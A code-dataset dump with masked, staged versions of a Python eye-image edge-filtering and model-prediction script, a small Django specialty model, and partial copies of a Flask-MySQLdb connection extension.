cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\n<mask token>\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',\n error_bad_lines=False, index_col=0)\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\nx_train, y_train = set_data(train_img_path, label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path, label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\nouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-4": "import random\nimport tqdm\nfrom keras.models import load_model\nfrom ModelUtil import precision, recall, f1\nfrom tqdm import tqdm\nimport cv2 as cv\nimport numpy as np\nimport os\nimport pandas as pd\nfrom PIL import Image\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',\n error_bad_lines=False, index_col=0)\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\nx_train, y_train = set_data(train_img_path, label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path, label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\nouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-5": "\nimport random\nimport tqdm\nfrom keras.models import load_model\nfrom ModelUtil import precision, recall, f1\nfrom tqdm import tqdm\nimport cv2 as cv\nimport numpy as np\nimport os\nimport pandas as pd\nfrom PIL import Image\n\n\nos.environ['CUDA_VISIBLE_DEVICES']='1'\n\n\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv', error_bad_lines=False, index_col=0)\n\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n\n return im\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path,\n custom_objects={'precision': precision, 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n\n return ret\n\ndef sobel(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n\n return ret\n\n\ndef scharr(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n\n\n return ret\n\ndef laplace(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m,:] = out\n\n return ret\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image/255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.\n else:\n low_clip = 0.\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out*255)\n ret[m, :] = out\n return ret\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path,\n custom_objects={'precision': precision, 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n\n## if you would like to use sobel\nx_train, y_train = set_data(train_img_path,label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path,label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\n\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\n\nouput_csv(X_, Y_, 'sobel_eye.csv')\n\n## original output without operator\n# x_train, y_train = set_data(train_img_path,label_df)\n# y_in = np.c_[y_train, np.ones(y_train.shape[0])]\n# x_test, y_test = set_data(test_img_path,label_df)\n# y_out = np.c_[y_test, np.zeros(y_test.shape[0])]\n#\n# X_ = np.r_[x_train, x_test]\n# Y_ = np.r_[y_in, y_out]\n#\n# ouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Especialidade(models.Model):
def __str__(self):
return self.nome
# add unique=True?
nome = models.CharField(max_length=200, verbose_name=_('Especialidade'), unique=True, blank=False, null=False)
|
normal
|
{
"blob_id": "9cc672702d960088f0230cbd1694b295216d8b5a",
"index": 4617,
"step-1": "<mask token>\n\n\nclass Especialidade(models.Model):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'),\n unique=True, blank=False, null=False)\n",
"step-4": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'),\n unique=True, blank=False, null=False)\n",
"step-5": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Especialidade(models.Model):\n def __str__(self):\n return self.nome\n\n # add unique=True?\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'), unique=True, blank=False, null=False)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# 2019/10/08 2019년10월8일
ss = input('날짜: 년/월/일 입력-> ')
sslist = ss.split('/')
print(sslist)
print('입력하신 날짜의 10년 후 -> ', end='')
year = int(sslist[0]) + 10
print(str(year) + "년", end='')
print(sslist[1] + "월", end='')
print(sslist[2] + "일")
|
normal
|
{
"blob_id": "fb2ef5a90b6e2582450726905868dd1b78e36166",
"index": 5008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(sslist)\nprint('입력하신 날짜의 10년 후 -> ', end='')\n<mask token>\nprint(str(year) + '년', end='')\nprint(sslist[1] + '월', end='')\nprint(sslist[2] + '일')\n",
"step-3": "ss = input('날짜: 년/월/일 입력-> ')\nsslist = ss.split('/')\nprint(sslist)\nprint('입력하신 날짜의 10년 후 -> ', end='')\nyear = int(sslist[0]) + 10\nprint(str(year) + '년', end='')\nprint(sslist[1] + '월', end='')\nprint(sslist[2] + '일')\n",
"step-4": "# 2019/10/08 2019년10월8일\r\n\r\nss = input('날짜: 년/월/일 입력-> ')\r\n\r\nsslist = ss.split('/')\r\nprint(sslist)\r\n\r\nprint('입력하신 날짜의 10년 후 -> ', end='')\r\nyear = int(sslist[0]) + 10\r\nprint(str(year) + \"년\", end='')\r\nprint(sslist[1] + \"월\", end='')\r\nprint(sslist[2] + \"일\")\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
<|reserved_special_token_0|>
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
<|reserved_special_token_0|>
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Initialize the `app` for use with this
:class:`~flask_mysqldb.MySQL` class.
This is called automatically if `app` is passed to
:meth:`~MySQL.__init__`.
:param flask.Flask app: the application to configure for use with
this :class:`~flask_mysqldb.MySQL` class.
"""
app.config.setdefault('MYSQL_HOST', 'localhost')
app.config.setdefault('MYSQL_USER', None)
app.config.setdefault('MYSQL_PASSWORD', None)
app.config.setdefault('MYSQL_DB', None)
app.config.setdefault('MYSQL_PORT', 3306)
app.config.setdefault('MYSQL_UNIX_SOCKET', None)
app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
app.config.setdefault('MYSQL_USE_UNICODE', True)
app.config.setdefault('MYSQL_CHARSET', 'utf8')
app.config.setdefault('MYSQL_SQL_MODE', None)
app.config.setdefault('MYSQL_CURSORCLASS', None)
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
<|reserved_special_token_0|>
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Initialize the `app` for use with this
:class:`~flask_mysqldb.MySQL` class.
This is called automatically if `app` is passed to
:meth:`~MySQL.__init__`.
:param flask.Flask app: the application to configure for use with
this :class:`~flask_mysqldb.MySQL` class.
"""
app.config.setdefault('MYSQL_HOST', 'localhost')
app.config.setdefault('MYSQL_USER', None)
app.config.setdefault('MYSQL_PASSWORD', None)
app.config.setdefault('MYSQL_DB', None)
app.config.setdefault('MYSQL_PORT', 3306)
app.config.setdefault('MYSQL_UNIX_SOCKET', None)
app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
app.config.setdefault('MYSQL_USE_UNICODE', True)
app.config.setdefault('MYSQL_CHARSET', 'utf8')
app.config.setdefault('MYSQL_SQL_MODE', None)
app.config.setdefault('MYSQL_CURSORCLASS', None)
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
